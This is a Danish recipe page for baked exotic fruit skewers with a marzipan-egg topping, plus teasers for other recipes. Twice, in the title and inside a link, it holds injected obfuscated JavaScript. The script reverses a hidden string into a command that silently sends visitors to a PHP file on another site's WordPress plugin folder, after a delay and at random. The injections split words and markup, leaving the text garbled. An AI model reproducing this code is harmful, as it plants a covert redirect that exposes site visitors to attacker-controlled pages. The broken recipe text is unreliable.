Frugtspyd gratineret med m$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andelcreme

Eksotiske frugter, der kommer en tur i ovnen, hvor de udvikler endnu større sødme og en kraftigere smag. De får følge af en mandelcreme, som smyger sig om frugten og fuldender desserten.

Opskrift til 4-8 pers.

1 kg eksotisk frugt, fx mango, ananas og dadler
8 grillspyd
200 g marcipan
1 æg
1 æggeblomme

Se evt. opskrift på$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andard&_thumbnail_id=4333&preview=true”> hjemmelavet marcipan her

Skræl frugten, og skær den i store tern. Kom frugten på træspyd. Bland marcipan med æg og æggeblomme, og ælt det godt igennem. Fordel marcipanmassen oven på frugtspyddene. Kom frugtspyddene i ovnen ved 225 grader, og bag dem, til marcipanmassen er gylden.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere